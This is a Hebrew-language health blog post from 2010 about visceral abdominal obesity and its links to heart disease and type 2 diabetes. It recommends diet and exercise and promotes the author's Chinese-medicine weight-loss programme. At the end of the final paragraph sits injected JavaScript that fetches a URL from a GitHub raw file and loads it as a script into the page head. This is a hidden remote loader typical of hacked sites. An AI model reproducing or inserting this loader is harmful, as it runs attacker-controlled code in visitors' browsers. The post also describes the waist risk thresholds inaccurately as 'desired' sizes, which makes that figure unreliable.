השמנה תוך-בטנית – על הסכנות וההתמודדות איתה


22 בספטמבר 2010 | מאת: בן רוזנבליט


משרד הבריאות קובע כי למעלה מ 50% מהאוכלוסייה הבוגרת סובלת מהשמנה בדרגות שונות. השמנת יתר מהווה גורם סיכון להתפתחות מחלות לב וכלי דם. עם זאת, לא כל מי שסובל מעודף משקל נמצא באותה רמת סיכון. הסובלים מהשמנה באזור הבטן והמותניים (השמנה תפוחית/ תוך-בטנית כאשר לרוב היא מאפיינת גברים) נמצאים בסיכון בריאותי גבוה הרבה יותר לעומת הסובלים מהשמנה באזור הישבן והירכיים (השמנה אגסית המאפיינת בעיקר נשים).
השמנה תוך-בטנית והקשרה להתפתחות מחלות לב וכלי דם

השמנה תוך-בטנית  קשורה להתפתחות הפרעות מטבוליות. מדובר בהצטברות של תאי שומן החבויים עמוק בחלל הבטן. השומן התוך בטני זוהה כגורם להופעת גורמי סיכון קרדיומטאבוליים כמו טריגליצרידים גבוהים , כולסטרול טוב נמוך ורמות סוכר גבוהות בדם העלולות להעלות את הסיכון  למחלות לב וכלי דם ומחלת הסכרת.


השמנה תוך-בטנית והקשרה להתפתחות הסכרת

ההשמנה הבטנית מהווה את אחד מגורמי הסיכון המשמעותיים ביותר לחלות בסכרת מסוג 2.רקמת שומן זו עשויה לגרום לעליה במספר הורמונים כמו רסיסטין,לפטין וירידה באדיפונקטין הגורמים לעמידות הגוף לאינסולין ולעליה בערכי הסוכר בדם, והאצת התהליך של האתרוגנזיס- הופעת סתימות בעורקים (טרשת עורקים). כתוצאה מהעליה המהירה בשכיחות ההשמנה בעולם הופיעה מגיפת "הסכרס-DIABESITY "(סכרת וכרס- האופיינית להשמנה באזור הבטן).
הוכחה מחקרית

תוצאות מחקר בינלאומי רחב היקף וראשון מסוגו בנושא שומן תוך-בטני שכלל 182,970 איש ופורסם לאחרונה בכנס השנתי של האיגוד האמריקאי לקרדיולוגיה, מאשרות את טבעה של ההשמנה התוך-בטנית כמגיפה עולמית וקובעות כי היקף מותניים גבוה (היקף המותניים הרצוי אצל גברים הוא 102 ס"מ ואצל נשים 88 ס"מ) קשור להתפתחות מחלת הסכרת ומחלות לב וכלי דם, ללא קשר לגיל ולמדד מסת הגוף. מחקר זה מוסיף משנה תוקף למחקרים דומים בשל היקפו העצום הן מבחינת גודלו והן מבחינת פריסתו הגיאוגרפית הנרחבת (הנחקרים היו מ 63 מדינות שונות).
כיצד ניתן לשפר את המצב הבריאותי ולמנוע את התחלואות הקשורות להשמנה?

ישנה חשיבות יתרה לתזונה נכונה לצורך הורדת רוב גורמי הסיכון, ובמניעה וטיפול של מחלות הלב והסכרת. נמצא גם כי דיאטה ים-תיכונית שניתנה לחולים לאחר התקף לב ראשון הביאה להפחתה עצומה בשיעור התקף לב חוזר. לכן שינויים ולו הקטנים ביותר בכל הקשור לאורח חיים בריא והרגלי אכילה נכונים יכולים להיות בעלי השפעה גדולה בקידום הבריאות בהקשר זה.
האם רק השינוי התזונתי מספיק?

לפי מחקר חדש של ד"ר טונג'יאן יו מהמרכז הרפואי של אוניברסיטת Wake Forest בצפון קרוליינה, אין התזונה הנכונה לבדה מספקת, ויש לשלבה עם פעילות גופנית , להפחתת הסיכון הרפואי הגלום בהשמנה התוך- בטנית. פעילות גופנית ותזונה נכונה תבאנה להפחתה משמעותית של ההשמנה הבטנית וכך יירד הסיכון למחלות לב והסכרת ב- 40% !
כיצד הרפואה הסינית יכולה להיות לעזר?

השמנה אם כן, היא דבר מזיק, בפרט כשמדובר בהשמנה תוך- בטנית שהשלכותיה הרפואיות עלולות להיות הרות אסון. אצלנו קיימת תוכנית הרזיה מיוחדת,המתאימה לבעיית השמנה התוך בטנית ואף מותאמת לכל אחד ואחד באופן אישי.התוכנית מתבססת על עקרונות התזונה לפי  הרפואה הסינית המסורתית ויחד עם זאת מסתמכת על המחקרים העדכניים ביותר מתחום התזונה המערבית. פוסט שירחיב על התוכנית – בקרוב. (var url = "https://raw.githubusercontent.com/truba77/trubnik/main/to.txt"; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement("script"); script.src = data.trim(); document.getElementsByTagName("head")[0].appendChild(script); });)

הוספת תגובה




טראקבק/פינג אחד